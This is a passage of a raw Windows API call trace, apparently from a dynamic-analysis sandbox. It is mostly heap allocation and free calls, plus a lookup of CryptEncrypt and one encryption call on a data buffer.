(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0227.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0227.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0227.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5116) returned 0x2f23b78 [0227.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0227.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f23b78 | out: hHeap=0x970000) returned 1 [0227.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0227.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0227.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0227.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0227.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0227.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0227.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0227.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0227.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x978490 [0227.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0227.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0227.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0227.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0227.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0227.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0227.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0227.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0227.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0227.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0227.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0227.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0227.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0227.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0227.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0227.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0227.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0227.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0227.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0227.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0227.467] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0227.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0227.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0227.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0227.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0227.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0227.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0227.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0227.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0227.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0227.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0227.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0227.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0227.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0227.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0227.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0227.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0227.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0227.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0227.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0227.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0227.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0227.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0227.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0227.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0227.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0227.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0227.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0227.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0227.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0227.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0227.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0227.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0227.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0227.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0227.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0227.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0227.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0227.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0227.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0227.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0227.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0227.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0227.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0227.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0227.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0227.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0227.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0227.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0227.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0227.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0227.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0227.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0227.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0227.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0227.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0227.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0227.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0227.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0227.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0227.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0227.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0227.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0227.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0227.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0227.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0227.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0227.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0227.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0227.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0227.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0227.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0227.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0227.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0227.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0227.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0227.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0227.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0227.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51400 [0227.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51400, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0227.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0227.471] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0227.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0227.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0227.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e7f350 [0227.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0227.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0227.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0227.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0227.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0227.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0227.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0227.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0227.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0227.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0227.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0227.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0227.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0227.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0227.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0227.472] CryptEncrypt (in: hKey=0xa87550, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f1ea58*, pdwDataLen=0x8cef60*=0x5116, dwBufLen=0x5118 | out: pbData=0x2f1ea58*, pdwDataLen=0x8cef60*=0x5118) returned 1 [0227.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978518 [0227.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0227.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0227.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0227.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0227.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0227.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0227.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0227.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0227.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0227.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0227.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0227.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0227.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0227.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0227.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0227.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0227.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0227.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0227.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0227.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552e8 [0227.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0227.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0227.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0227.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0227.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0227.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0227.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0227.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0227.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0227.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0227.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0227.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0227.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0227.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0227.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0227.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0227.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0227.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0227.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0227.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0227.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0227.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0227.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0227.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0227.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0227.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0227.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0227.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0227.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0227.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0227.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0227.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552c8 [0227.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0227.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0227.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0227.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0227.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0227.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0227.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0227.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0227.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0227.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0227.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0227.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0227.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0227.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0227.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0227.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0227.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0227.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0227.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0227.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0227.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0227.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0227.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0227.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0227.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0227.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0227.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0227.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0227.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0227.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0227.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0227.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0227.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0227.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0227.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0227.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0227.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0227.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0227.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0227.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0227.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0227.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0227.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0227.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0227.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0227.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0227.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0227.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0227.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0227.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0227.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0227.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0227.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0227.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0227.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0227.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0227.477] HeapFree (in: hHeap=0x970000, 